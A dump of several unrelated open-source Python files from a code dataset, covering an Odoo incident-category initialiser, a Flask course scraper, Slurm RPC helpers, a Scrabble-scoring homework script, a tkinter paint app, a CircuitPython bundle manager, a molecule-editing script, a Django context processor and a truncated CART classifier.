Également, une information préoccupante est automatiquement envoyée au Conseil Départemental, par mail.\",\n 'code': 'SP',\n }\n add_dict4 = {\n 'name': u'Situation exceptionnelle pour public d’AMI ou de CHU',\n 'description': u'Evènement ou dysfonctionnement grave pouvant affecter l’accompagnement des personnes accompagnées ou menacer leur santé, sécurité ou bien-être.',\n 'code': 'SEA',\n }\n \n if type_data1:\n exist_ids = add_data_obj.search([('name', '=', type_data1.name)])\n if not exist_ids:\n add_data_obj.create(add_dict1)\n else:\n for e in exist_ids:\n e.write(add_dict1)\n if type_data2:\n exist_ids = add_data_obj.search([('name', '=', type_data2.name)])\n if not exist_ids:\n add_data_obj.create(add_dict2)\n else:\n for e in exist_ids:\n e.write(add_dict2)\n if type_data3:\n exist_ids = add_data_obj.search([('name', '=', type_data3.name)])\n if not exist_ids:\n add_data_obj.create(add_dict3)\n else:\n for e in exist_ids:\n e.write(add_dict3)\n if type_data4:\n exist_ids = add_data_obj.search([('name', '=', type_data4.name)])\n if not exist_ids:\n add_data_obj.create(add_dict4)\n else:\n for e in exist_ids:\n e.write(add_dict4)\n return True\n\n\nclass add_is_nature_evenement(models.TransientModel):\n _name = 'add.is.nature.evenement'\n _description = u\"Initialisation Nature Evènement \"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.nature.evenement']\n type_data1 = self.env.ref('is_eig12.is_type_evenement_1', False)\n type_data2 = self.env.ref('is_eig12.is_type_evenement_2', False)\n type_data3 = self.env.ref('is_eig12.is_type_evenement_3', False)\n type_data4 = self.env.ref('is_eig12.is_type_evenement_4', False)\n add_list = [\n [u\"Absence imprévue de plusieurs professionnels, mettant en difficulté l’effectivité de l’accompagnement ou la sécurité des personnes accueillies\", 1],\n [u\"Autre (accident ou incident lié à une erreur ou à un défaut de soin ou de surveillance)\", 2],\n [u\"Autre (évènement en santé environnementale)\", 3],\n [u\"Autre (évènement relatif à l’accompagnement des usagers)\", 4],\n [u\"Autre (évènement relatif au fonctionnement et organisation de l’établissement)\", 5],\n [u\"Comportements violents de la part d’usagers à l’égard d’autres usagers\", 6],\n [u\"Comportements violents de la part d’usagers à l’égard de professionnels\", 7],\n [u\"Conflits sociaux ou menaces de conflits sociaux pouvant entraîner un risque pour l’usager\", 8],\n [u\"Décès accidentel ou consécutif à un défaut de surveillance ou de prise en charge de la personne\", 9],\n [u\"Défaillance technique significative et durable\", 10],\n [u\"Difficultés relationnelles récurrentes avec la famille entraînant une perturbation de l’organisation ou du fonctionnement de la structure\", 11],\n [u\"Disparition(s) inquiétante(s) de personne(s) accueillie(s) (services de police ou gendarmeries alertés)\", 12],\n [u\"Epidémie\", 13],\n [u\"Erreur d’identité dans la délivrance d’un médicament\", 14],\n [u\"Fugue(s) inquiétante(s) de personne(s) accueillie(s) (services de police ou gendarmeries alertés)\", 15],\n [u\"Intoxication\", 16],\n [u\"Intrusion informatique\", 17],\n [u\"Légionnelles\", 18],\n [u\"Maladie infectieuse\", 19],\n [u\"Maltraitances non précisées\", 20],\n [u\"Manquements graves au règlement du lieu d’hébergement ou d’accueil qui compromettent la prise en charge\", 21],\n [u\"Mise en danger par dérive sectaire et radicalisation\", 22],\n [u\"Négligences graves ou erreurs successives\", 23],\n [u\"Non-respect de la prescription médicale, erreur dans la 
dispensation, la préparation ou l’administration\", 24],\n [u\"Présentation de faux diplômes\", 26],\n [u\"Sinistre ou évènement météorologique exceptionnel\", 27],\n [u\"Suicide\", 28],\n [u\"Turn-over du personnel ou grève, mettant en difficulté l’effectivité de l’accompagnement ou la sécurité des personnes accueillies\", 29],\n [u\"Vacance de poste prolongée, notamment d’encadrement, difficulté de recrutement\", 30],\n [u\"Violences médicales ou médicamenteuses\", 31],\n [u\"Vols récurrents à l’encontre des résidents, si dépôt de plainte\", 32],\n ]\n common_list = [\n [u\"Actes de malveillance au sein de la structure\", 33],\n [u\"Autre (évènement relatif à la sécurité des biens et des personnes)\", 34],\n [u\"Tentative de suicide\", 35],\n [u\"Violences physiques\", 36],\n [u\"Violences psychologiques et morales\", 37],\n [u\"Violences sexuelles\", 38],\n ]\n chu_list = [\n [u\"Accident corporel grave\", 39],\n [u\"Autre (évènements relatifs aux victimes présumées)\", 40],\n [u\"Décès\", 41],\n [u\"Défaillances techniques graves\", 42],\n [u\"Epidémie - Propagation de parasites\", 43],\n [u\"Explosions ou incendie ou inondation\", 44],\n [u\"Fugues ou disparition de personnes accueillies > à 48 H\", 45],\n [u\"Intoxication alimentaire si plusieurs personnes sont concernées\", 46],\n [u\"Négligences graves de l’entourage\", 47],\n [u\"Racket\", 48],\n [u\"Trafic au sein de l’établissement\", 49],\n [u\"Vols récurrents et /ou qualifiés à l’encontre des autres résidents et ou des salariés ou des bénévoles\", 50],\n ]\n if type_data1 and type_data2 and type_data3:\n for data in add_list:\n nature_ids = add_data_obj.search([('name', '=', data[0])])\n if not nature_ids:\n create_id = add_data_obj.create({'name': data[0], 'code': data[1]})\n type_data1.is_nature_ids = [(4,create_id.id)]\n type_data2.is_nature_ids = [(4,create_id.id)]\n type_data3.is_nature_ids = [(4,create_id.id)]\n else:\n for n in nature_ids:\n n.write({'name': data[0], 'code': data[1]})\n type_data1.is_nature_ids = [(4,nature_ids.ids[0])]\n type_data2.is_nature_ids = [(4,nature_ids.ids[0])]\n type_data3.is_nature_ids = [(4,nature_ids.ids[0])]\n if type_data1 and type_data2 and type_data3 and type_data4:\n for data in common_list:\n nature_ids = add_data_obj.search([('name', '=', data[0])])\n if not nature_ids:\n create_id = add_data_obj.create({'name': data[0], 'code': data[1]})\n type_data1.is_nature_ids = [(4,create_id.id)]\n type_data2.is_nature_ids = [(4,create_id.id)]\n type_data3.is_nature_ids = [(4,create_id.id)]\n type_data4.is_nature_ids = [(4,create_id.id)]\n else:\n for n in nature_ids:\n n.write({'name': data[0], 'code': data[1]})\n type_data1.is_nature_ids = [(4,nature_ids.ids[0])]\n type_data2.is_nature_ids = [(4,nature_ids.ids[0])]\n type_data3.is_nature_ids = [(4,nature_ids.ids[0])]\n type_data4.is_nature_ids = [(4,nature_ids.ids[0])]\n if type_data4:\n for data in chu_list:\n nature_ids = add_data_obj.search([('name', '=', data[0])])\n if not nature_ids:\n create_id = add_data_obj.create({'name': data[0], 'code': data[1]})\n type_data4.is_nature_ids = [(4,create_id.id)]\n else:\n for n in nature_ids:\n n.write({'name': data[0], 'code': data[1]})\n type_data4.is_nature_ids = [(4,nature_ids.ids[0])]\n return True\n\n\nclass add_is_destinataire(models.TransientModel):\n _name = 'add.is.destinataire'\n _description = u\"Initialisation Destinataires\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.destinataire']\n add_list = [\n u\"Media\",\n u\"Famille/représentant légal de la (des) 
personne(s) faisant l’objet de l’IP\",\n u\"Famille/représentant légal d'autre(s) usager(s) concerné(s)\",\n u\"Autorité judiciaire\",\n u\"Cellule de l'enfance\",\n u\"Usager / Patient / Résident\",\n ]\n for data in add_list:\n destinataire_ids = add_data_obj.search([('name', '=', data)])\n if not destinataire_ids:\n add_data_obj.create({'name': data})\n return True\n\n\nclass add_is_qualite(models.TransientModel):\n _name = 'add.is.qualite'\n _description = u\"Initialisation Qualité\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.qualite']\n add_list = [\n \"Usager\",\n \"Famille\",\n \"Autre\",\n ]\n for data in add_list:\n qualite_ids = add_data_obj.search([('name', '=', data)])\n if not qualite_ids:\n add_data_obj.create({'name': data})\n return True\n\n\nclass add_is_qualite_autre(models.TransientModel):\n _name = 'add.is.qualite.autre'\n _description = u\"Initialisation Qualité Autre\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.qualite.autre']\n add_list = [\n \"Usager\",\n \"Famille\",\n \"Professionnel\",\n \"Autre\",\n ]\n for data in add_list:\n qualite_ids = add_data_obj.search([('name', '=', data)])\n if not qualite_ids:\n add_data_obj.create({'name': data})\n return True\n\n\n","repo_name":"tonygalmiche/is_eig12","sub_path":"wizard/company_action.py","file_name":"company_action.py","file_ext":"py","file_size_in_byte":18022,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
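The initialisation wizards above all repeat the same search-then-create-or-write pattern. A minimal sketch of how that pattern could be factored into one shared helper; the add.data.helper model and the upsert_by_name name are illustrative additions, not part of the original module, and the odoo import assumes a version that still supports the @api.multi style used above:

# Hypothetical shared helper -- not in the original module.
from odoo import api, models

class AddDataHelper(models.AbstractModel):
    _name = 'add.data.helper'
    _description = u"Create-or-update helper for the init wizards"

    @api.model
    def upsert_by_name(self, model_name, vals):
        # Create the record when no record with this name exists,
        # otherwise update every matching record in a single write().
        target = self.env[model_name]
        existing = target.search([('name', '=', vals['name'])])
        if not existing:
            return target.create(vals)
        existing.write(vals)
        return existing

Each wizard's add_data() loop would then shrink to one call per row, e.g. self.env['add.data.helper'].upsert_by_name('is.qualite', {'name': data}).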
+{"seq_id":"13311588585","text":"# app.py\nfrom flask import Flask, render_template, request\nfrom scraper import scrape_site\nimport pandas as pd\nfrom html_to_df import *\nfrom cleandata import *\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n data = \"\"\n if request.method == 'POST':\n # Get the values from the form\n subj = request.form.get('text1')\n crse = request.form.get('text2')\n\n path = scrape_site()\n courses = returndf(path)\n \n # Remove rows where all values are spaces\n courses = fix_spacing(courses)\n \n # Fix names of some columns\n courses = courses.rename(columns=clean_columns) \n\n # Only keep columns we actually need (remove unnecessary columns)\n courses = courses[['crn','subj','crse','sect','title','prof','day_beg_end_bldgroom_type', 'hrs', 'avail']]\n \n # convert float types to ints\n convert_floats(courses)\n\n filtered_df = courses[(courses['subj'] == subj) & (courses['crse'] == crse)]\n if filtered_df.empty:\n data = \"
No data found for the provided criteria.
\"\n else:\n data = filtered_df.to_html(classes=\"table table-bordered\", index=False)\n \n return render_template('index.html', data=data)\n \n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Ahmad1786/profbot_scraping","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"19840476665","text":"import sys\nif sys.version_info.major == 2:\n import xmlrpclib\n import httplib\nelse:\n import xmlrpc.client as xmlrpclib\n import http.client as httplib\n\nimport socket\nfrom dns import resolver, reversename\nimport time\n\n#COMMANDS\nNOOP=0\nSTOP=1\nDIE=2\nCANCEL=3\nREREGISTER=4\nDEASSIGN=5\n\n#MODES\nRUNNING = 1\nSTOPPING= 2\n\n\n\nclass TimeoutHTTPConnection(httplib.HTTPConnection):\n def __init__(self,host,timeout=70):\n httplib.HTTPConnection.__init__(self, host, timeout = timeout)\n\nclass TimeoutTransport(xmlrpclib.Transport):\n def __init__(self, timeout = 70, *l, **kw):\n xmlrpclib.Transport.__init__(self, *l, **kw)\n self.timeout = timeout\n\n def make_connection(self, host):\n conn = TimeoutHTTPConnection(host, self.timeout)\n return conn\n\nclass TimeoutServerProxy(xmlrpclib.ServerProxy):\n def __init__(self, uri, timeout = 70, *l, **kw):\n kw['transport'] = TimeoutTransport(timeout = timeout, use_datetime = kw.get('use_datetime', 0))\n xmlrpclib.ServerProxy.__init__(self, uri, *l, **kw)\n\n#self register\nport = 38763\naddress = '127.0.0.1'\njob_url = 'http://' + address + ':' + str(port + 1)\n\ncache_hostname = None\ndef get_hostname():\n #get IP address\n global cache_hostname\n if not cache_hostname is None:\n return cache_hostname\n adresses = ['google.com', 'nu.nl', 'tweakers.net']\n while adresses:\n try:\n socket.setdefaulttimeout(30)\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); \n s.connect((adresses[0], 0)); \n myip = s.getsockname()[0]\n s.close()\n break\n except:\n adresses = adresses[1:]\n\n\n try:\n addr=reversename.from_address(myip)\n myip = str(resolver.query(addr,\"PTR\")[0])[:-1]\n except Exception as e:\n myip = socket.gethostname().split('.')[0]\n pass\n \n if '-bb' in myip:\n myip = myip.split('-bb')[0]\n if '.' in myip:\n myip = myip.split('.')[0]\n cache_hostname = myip\n \n return myip\n\ndef short_name(name):\n return name.split(\".\")[0].split('-')[0]\n \n","repo_name":"mhulsman/slurm_withinnode_scheduler","sub_path":"xslurm_shared.py","file_name":"xslurm_shared.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
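Usage sketch for the timeout-aware proxy defined above; job_url (port + 1) comes from the module itself, but the noop remote method name is a placeholder for whatever the job server actually exposes:

# Call the job server with a hard 10-second timeout instead of the 70s default.
proxy = TimeoutServerProxy(job_url, timeout=10)
try:
    proxy.noop()  # placeholder remote method; faults and timeouts raise here
except (socket.timeout, xmlrpclib.Fault, OSError) as e:
    print('RPC failed:', e)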
+{"seq_id":"24665524286","text":"# Count how many times a given number k occurs in the array list_1.\n\n# list_1 = [1, 2, 3, 3, 5, 6, 3]\n# k = int(input(\"Enter a number: \"))\n# count = 0\n# for i in range (0, len(list_1)):\n#     if k == list_1[i]:\n#         count += 1\n# print(count)\n\n# Find the element of list_1 that is closest in value to a given number k\n# and print it.\n\n# list_1 = [5, 6, 1, 2, 4]\n# k = int(input(\"Enter a number: \"))\n# number = 0\n# min = (k - list_1[0])**2\n# for i in range (len(list_1)):\n#     if (k-list_1[i])**2 <= min:\n#         min = (k-list_1[i])**2\n#         number=i\n# print(list_1[number])\n\n# m = abs(k - list_1[0]) # absolute value of the difference\n# number = list_1[0]\n# for i in range(1, len(list_1)):\n#     if m > abs(list_1[i] - k):\n#         m = abs(list_1[i] - k)\n#         number = list_1[i]\n# print(number)\n\n# In the board game Scrabble, every letter has a certain value.\n\n# For the English alphabet the points are distributed like this:\n\n# A, E, I, O, U, L, N, S, T, R – 1 point;\n# D, G – 2 points;\n# B, C, M, P – 3 points;\n# F, H, V, W, Y – 4 points;\n# K – 5 points;\n# J, X – 8 points;\n# Q, Z – 10 points.\n# Russian letters are scored like this:\n\n# А, В, Е, И, Н, О, Р, С, Т – 1 point;\n# Д, К, Л, М, П, У – 2 points;\n# Б, Г, Ё, Ь, Я – 3 points;\n# Й, Ы – 4 points;\n# Ж, З, Х, Ц, Ч – 5 points;\n# Ш, Э, Ю – 8 points;\n# Ф, Щ, Ъ – 10 points.\n# Write a program that computes the value of a word k entered by the user\n# and prints it. Assume a single word is entered, containing\n# either only English letters\n# or only Russian letters.\n\nlist_English = {1:'AEIOULNSTR', 2:'DG', 3:'BCMP', 4:'FHVWY', 5:\"K\" , 8:'JX', 10:'QZ'}\n# Note: the 10-point group was 'ФШЪ' in the original, but Ш is an 8-point letter;\n# per the rules above the 10-point letters are Ф, Щ, Ъ.\nlist_ru = {1:'АВЕИНОРСТ', 2:'ДКЛМПУ', 3:'БГЁЬЯ', 4:'ЙЫ', 5:'ЖЗХЦЧ', 8:'ШЭЮ', 10:'ФЩЪ'}\nk = input('Enter a word in Russian or English: ')\nsumma = 0\n\n# A single pass over the word is enough: each letter belongs to at most one of\n# the two tables, so both can be checked per letter. (The original wrapped this\n# in an extra loop over the dictionary keys, which multiplied the total, and it\n# printed the running sum twice without resetting it in between.)\nfor i in k:\n    for letter_map in (list_ru, list_English):\n        for key, value in letter_map.items():\n            if i.upper() in value:\n                summa += key\nprint(summa)\n","repo_name":"leleKKa/HW_python","sub_path":"HW3.py","file_name":"HW3.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
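An alternative that inverts the score tables once so that each letter lookup is O(1); a sketch building on the list_English/list_ru dictionaries above, not part of the original homework file:

def word_score(word, *score_tables):
    # Flatten the {points: letters} tables into a single letter -> points map.
    letter_points = {}
    for table in score_tables:
        for points, letters in table.items():
            for letter in letters:
                letter_points[letter] = points
    # Characters outside the tables (digits, punctuation) score 0.
    return sum(letter_points.get(ch, 0) for ch in word.upper())

print(word_score('Python', list_English))  # 3+4+1+4+1+1 = 14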
+{"seq_id":"10822383556","text":"from tkinter import *\nfrom tkinter import filedialog,messagebox,colorchooser\nfrom PIL import Image, ImageDraw\nimport PIL\nimport os\nimport datetime\n\n#defining window size\nWIDTH=500\nHEIGHT =500\nBLACK=(0,0,0)\nCENTER = WIDTH//2\n\nclass PaintGUI:\n    def __init__(self):\n        self.root = Tk()\n        self.root.title(\"Paint Clone\") \n\n        #brush width\n        self.brush_width=15\n        self.current_color=\"white\"\n\n\n        #setting width, height and color of canvas\n        self.cnv=Canvas(self.root,width=WIDTH-10,height=HEIGHT-10,bg =\"black\")\n        self.cnv.pack() #to pack widgets\n        self.cnv.bind(\"<B1-Motion>\", self.paint) # paint while dragging with the left mouse button held down (the original event string was lost in extraction; \"<B1-Motion>\" is the usual binding for a drag-to-paint handler)\n\n        self.image=PIL.Image.new(\"RGB\",(WIDTH,HEIGHT),BLACK)\n        self.draw=ImageDraw.Draw(self.image)\n\n        self.btn_frame=Frame(self.root)\n        self.btn_frame.pack(fill=X)\n\n        self.btn_frame.columnconfigure(0,weight=1)\n        self.btn_frame.columnconfigure(1,weight=1)\n        self.btn_frame.columnconfigure(2,weight=1)\n\n        self.clear_btn=Button(self.btn_frame,text=\"Clear\",command=self.clear)\n        self.clear_btn.grid(row=1,column=1, sticky = W+E)\n\n        self.save_btn=Button(self.btn_frame,text=\"Save square\",command=self.save_square)\n        self.save_btn.grid(row=1,column=2, sticky = W+E)\n\n        self.save_btn=Button(self.btn_frame,text=\"Save triangle\",command=self.save_triangle)\n        self.save_btn.grid(row=1,column=3, sticky = W+E)\n\n        self.save_btn=Button(self.btn_frame,text=\"Save circle\",command=self.save_circle)\n        self.save_btn.grid(row=0,column=3, sticky = W+E)\n\n        self.save_btn=Button(self.btn_frame,text=\"Save rectangle\",command=self.save_rectangle)\n        self.save_btn.grid(row=0,column=4, sticky = W+E)\n        \n        self.bplus_btn=Button(self.btn_frame,text=\"B+\",command=self.brush_plus) #increase brush size\n        self.bplus_btn.grid(row=0,column=1, sticky = W+E)\n\n        self.bminus_btn=Button(self.btn_frame,text=\"B-\",command=self.brush_minus)#decrease brush size\n        self.bminus_btn.grid(row=0,column=0, sticky = W+E)\n\n        # self.color_btn=Button(self.btn_frame,text=\"Change color\",command=self.change_color)\n        # self.color_btn.grid(row=0,column=2, sticky = W+E)\n\n        self.root.protocol(\"WM_DELETE_WINDOW\",self.close)\n        self.root.attributes(\"-topmost\",True)\n        self.root.mainloop()\n\n    \n    def paint(self,event):\n        x1,y1=(event.x-1),(event.y-1)\n        x2,y2=(event.x+1),(event.y+1)\n        self.cnv.create_rectangle(x1,y1,x2,y2,outline=self.current_color,fill=self.current_color,width=self.brush_width)\n        self.draw.rectangle([x1,y1,x2+self.brush_width,y2+self.brush_width],outline = self.current_color, fill=self.current_color,width=self.brush_width)\n    \n    def clear(self): #clearing the screen\n        self.cnv.delete(\"all\")\n        self.draw.rectangle([0,0,1000,1000],fill=\"black\")\n\n    def save_square(self):\n        now = datetime.datetime.now()\n        filename=\"image_{:%Y-%m-%d_%H-%M-%S}.png\".format(now)\n        default_dir = os.path.expanduser('square')\n        # filename = filedialog.asksaveasfilename(\n        #     initialdir=default_dir,\n        #     initialfile=filename,\n        #     defaultextension=\"png\",\n        #     filetypes=[(\"PNG\",\"JPG\"),(\".png\",\".jpg\")])\n        filename = os.path.join(default_dir, filename)\n        self.image.save(filename)\n\n    def save_triangle(self):\n        now = datetime.datetime.now()\n        filename=\"image_{:%Y-%m-%d_%H-%M-%S}.png\".format(now)\n        default_dir = os.path.expanduser('triangle')\n        # filename = filedialog.asksaveasfilename(\n        #     initialdir=default_dir,\n        #     initialfile=filename,\n        #     defaultextension=\"png\",\n        #     filetypes=[(\"PNG\",\"JPG\"),(\".png\",\".jpg\")])\n        filename = os.path.join(default_dir, filename)\n        
self.image.save(filename)\n\n def save_circle(self):\n now = datetime.datetime.now()\n filename=\"image_{:%Y-%m-%d_%H-%M-%S}.png\".format(now)\n default_dir = os.path.expanduser('circle')\n # filename = filedialog.asksaveasfilename(\n # initialdir=default_dir,\n # initialfile=filename,\n # defaultextension=\"png\",\n # filetypes=[(\"PNG\",\"JPG\"),(\".png\",\".jpg\")])\n filename = os.path.join(default_dir, filename)\n self.image.save(filename)\n \n def save_rectangle(self):\n now = datetime.datetime.now()\n filename=\"image_{:%Y-%m-%d_%H-%M-%S}.png\".format(now)\n default_dir = os.path.expanduser('rectangle')\n # filename = filedialog.asksaveasfilename(\n # initialdir=default_dir,\n # initialfile=filename,\n # defaultextension=\"png\",\n # filetypes=[(\"PNG\",\"JPG\"),(\".png\",\".jpg\")])\n filename = os.path.join(default_dir, filename)\n self.image.save(filename)\n\n\n def brush_plus(self):\n self.brush_width +=1\n\n def brush_minus(self):\n if self.brush_width>1:\n self.brush_width -=1\n\n # def change_color(self):\n # pass\n def close(self):\n quitorsave=messagebox.askyesnocancel(\"Quit\",\"Do you want to save your work?\",parent=self.root)\n if quitorsave is not None:\n if quitorsave:\n self.save()\n self.root.destroy()\n exit(0)\n\nPaintGUI()","repo_name":"prash00b/paint-app","sub_path":"paint.py","file_name":"paint.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
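The four save_* methods above differ only in the target directory. A sketch of collapsing them into one parametrized method; save_shape and the os.makedirs call are additions, the rest mirrors the original logic:

def save_shape(self, shape):
    # Save the current canvas image into a per-shape directory.
    now = datetime.datetime.now()
    filename = "image_{:%Y-%m-%d_%H-%M-%S}.png".format(now)
    target_dir = os.path.expanduser(shape)
    os.makedirs(target_dir, exist_ok=True)  # the original assumes the directory exists
    self.image.save(os.path.join(target_dir, filename))

# The four buttons could then be created in a loop:
# for col, shape in enumerate(("square", "triangle", "circle", "rectangle")):
#     Button(self.btn_frame, text="Save " + shape,
#            command=lambda s=shape: self.save_shape(s)).grid(row=1, column=col, sticky=W+E)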
+{"seq_id":"15523508333","text":"import logging\nfrom shutil import rmtree\n\nfrom constants import *\nfrom helpers.singleton import Singleton\nfrom managers.bundle_manager import BundleManager, Bundle\nfrom managers.credential_manager import CredentialManager\nfrom managers.data_manager import DataManager\nfrom managers.device_manager import DeviceManager\nfrom managers.device_manager import Drive\n\n\nclass CircuitPythonBundleManager(metaclass=Singleton):\n def __init__(self, settings_path: Path):\n self._selected_bundle = None\n self.on_new_selected_bundle = lambda: None\n self._selected_drive = None\n self.on_new_selected_drive = lambda: None\n self.cred_manager = CredentialManager(SERVICE_NAME, GITHUB_TOKEN_NAME)\n self.bundle_manager = BundleManager(BUNDLES_PATH)\n self.device_manager = DeviceManager(DRIVE_PATH)\n self.data_manager = DataManager(settings_path)\n\n def delete_bundle(self, bundle: Bundle):\n \"\"\"\n Delete a bundle.\n\n :param bundle: A Bundle.\n \"\"\"\n logging.warning(f\"Deleting bundle {bundle}\")\n path = bundle.path\n logging.debug(f\"Path is {path}\")\n rmtree(path)\n\n @property\n def selected_bundle(self) -> Bundle:\n \"\"\"\n Get the currently selected bundle.\n\n :return: A Bundle.\n \"\"\"\n return self._selected_bundle\n\n @selected_bundle.setter\n def selected_bundle(self, new_bundle: Bundle):\n \"\"\"\n Set the currently selected bundle.\n\n :param new_bundle: A Bundle.\n \"\"\"\n self._selected_bundle = new_bundle\n self.on_new_selected_bundle()\n\n @property\n def selected_drive(self) -> Drive:\n \"\"\"\n Get the currently selected bundle.\n\n :return: A Drive.\n \"\"\"\n return self._selected_drive\n\n @selected_drive.setter\n def selected_drive(self, new_drive: Drive):\n \"\"\"\n Set the currently selected bundle.\n\n :param new_drive: A Drive.\n \"\"\"\n self._selected_drive = new_drive\n self.on_new_selected_drive()\n","repo_name":"UnsignedArduino/CircuitPython-Bundle-Manager-v2","sub_path":"circuitpython_bundle_manager.py","file_name":"circuitpython_bundle_manager.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
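CircuitPythonBundleManager relies on a Singleton metaclass imported from helpers.singleton, which isn't shown in this file. A typical metaclass implementation looks like the sketch below; this is an assumption about that module, not its actual code:

class Singleton(type):
    # Every instantiation of a class using this metaclass returns one shared instance.
    _instances = {}

    def __call__(cls, *args, **kwargs):
        if cls not in cls._instances:
            cls._instances[cls] = super().__call__(*args, **kwargs)
        return cls._instances[cls]

class Manager(metaclass=Singleton):
    pass

assert Manager() is Manager()  # the second call reuses the first instance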
+{"seq_id":"29858693188","text":"#!/usr/bin/python\n# use like:\n# python replace.py answer.bas 1 14 2.0 0.75\n\n\nimport sys\nimport numpy as np\nimport atomicUtils as au\nimport plotUtils as pu\nimport matplotlib.pyplot as plt\n\natoms = np.genfromtxt ( 'answer.bas', skip_header=1 )\nbonds,bondVecs = au.findAllBonds( atoms, Rcut=3.0, RvdwCut=0.8 )\nneighs = au.neighs( len(atoms), bonds )\n\nselect1 = au.findTypeNeigh( atoms, neighs, 14, neighTyps={1:(2,2)} )\n\nselect2 = au.getAllNeighsOfSelected( select1, neighs, atoms, typs={1} )\nselect2 = list(select2.keys())\n\n#atoms[select1,0] = 16\n#atoms[select2,0] = 9\n#au.saveAtoms( atoms, \"test.xyz\", xyz=True )\n\ngroup = np.array([\n[6, 0.0, 0.0, 0.0 ],\n[1, +0.7,0.7, 0.0 ],\n[1, -0.7,0.7, 0.0 ]\n])\n\ngroup = np.array([\n[15, 0.0, 0.0, 0.0 ],\n[1, 0.0,1.5, 0.0 ],\n])\n\n\n'''\ngroup = np.array([\n[6, 0.0, 0.0, 0.0 ],\n[8, 1.0, 0.0, 0.0 ],\n[9, 0.0, 1.0, 0.0 ],\n[7, 0.0, 0.0, 1.0 ]\n])\n'''\n\npairs = au.findPairs_one( select2, atoms, Rcut=2.5 ); #print( pairs )\n\npairs = au.pairsNotShareNeigh( pairs, neighs ); #print( pairs )\n\ncog = au.findCOG( atoms[:,1:] )\n\natoms_ = au.replacePairs( pairs, atoms, group, up_vec=(cog,1) ); # print( \"atoms_ = \",atoms_ )\nau.saveAtoms( atoms_, \"atoms_.xyz\", xyz=True )\n\n# ---------- ploting\n\n'''\nrotMat = au.makeRotMat( [1.0,1.0,1.0], [0.0,1.0,0.0] )\nps = np.dot( rotMat, np.transpose(atoms[:,1:]) )\n\n\nprint( ps.shape )\n\n#plt.plot( ps[0], ps[1], 'ok' )\n\n#pu.plotAtoms( atoms[:,0], ps[0], ps[1] )\n#pu.plotBonds( [ b[0] for b in bonds], ps[0], ps[1] )\n#pu.plotBonds( pairs, ps[0], ps[1] )\n\nplt.axis('equal')\nplt.show()\n'''\n","repo_name":"ProkopHapala/SimpleSimulationEngine","sub_path":"python/pyMolecular/examples/replace100.py","file_name":"replace100.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"91"}
+{"seq_id":"72806392622","text":"from .models import Link\r\n\r\ndef diccionario_contexto(request): # This function extends the template context dictionary's functionality.\r\n    ctx = {} # ctx stands for context. Start with an empty context dictionary.\r\n    links = Link.objects.all()\r\n    for link in links:\r\n        ctx[link.key] = link.url # Build a dictionary with the social-network URL for each key, i.e. {\"LINK_FACEBOOK\": \"www.facebook.com\", ...}\r\n    return ctx\r\n\r\n# By adding this script to settings.py (more precisely, to \"context_processors\"),\r\n# this dictionary becomes accessible from any template of any application.","repo_name":"DanielRosasPerez/Web_empresa","sub_path":"social/processors.py","file_name":"processors.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
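As the closing comment says, the processor becomes available everywhere once registered in settings.py. A sketch of that registration, assuming the app is importable as social (taken from the file's path); the template line shows how a Link with key LINK_FACEBOOK would be used:

# settings.py (sketch)
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'social.processors.diccionario_contexto',  # the function above
            ],
        },
    },
]

# In any template of any app:
#   <a href="{{ LINK_FACEBOOK }}">Facebook</a>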
+{"seq_id":"9846448779","text":"#!/usr/bin/env python3\nimport itertools\nimport logging\nimport numpy as np\nimport log_setup\n\nclass TreeNode(object):\n def __init__(self, feat_name, feat_idx, feat_val, samp_cnt, left=None, right=None):\n self._feat_name = feat_name\n self._feat_idx = feat_idx\n self._feat_val = feat_val\n self._samp_cnt = samp_cnt\n\n self._left = left\n self._right = right\n\n def to_string(self):\n return [\n 'feat_name:{}, feat_idx:{}, feat_val:{}, samp_cnt:{}'.format(\n self._feat_name,\n self._feat_idx, self._feat_val, self._samp_cnt),\n self._left.to_string(),\n self._right.to_string(),\n ]\n\n\nclass LeafNode(object):\n def __init__(self, value, response_values, left=None, right=None):\n self._value = value\n self._samp_cnt = len(response_values)\n self._uniq, self._cnts = np.unique(response_values, return_counts=True)\n self._left = left\n self._right = right\n\n def to_string(self):\n return ['value:{}, samp_cnt:{}, uniq:{}, cnts:{}'.format(self._value, self._samp_cnt, self._uniq, self._cnts)]\n\n\nclass CartClassification(object):\n def __init__(self):\n self._min_split_info_gain = 1e-6\n self._min_split_size = 3\n\n def train(self, names, samples, cate_feats):\n self._feat_names = names\n self._samples = samples\n # key: feature's column index in samples\n # value: string value to numeric value\n self._cate_feats = cate_feats\n self._cart_tree = self._recursive_tree(np.arange(len(self._samples)))\n\n def _binary_split(self, samples, indices, feat_idx, feat_val):\n if feat_idx not in self._cate_feats:\n # numerical feature, feat_val is a float\n pos = samples[indices, feat_idx] <= feat_val\n else:\n # categorical feature, feat_val is a list\n pos = np.isin(samples[indices, feat_idx], feat_val)\n l_indices = indices[pos]\n 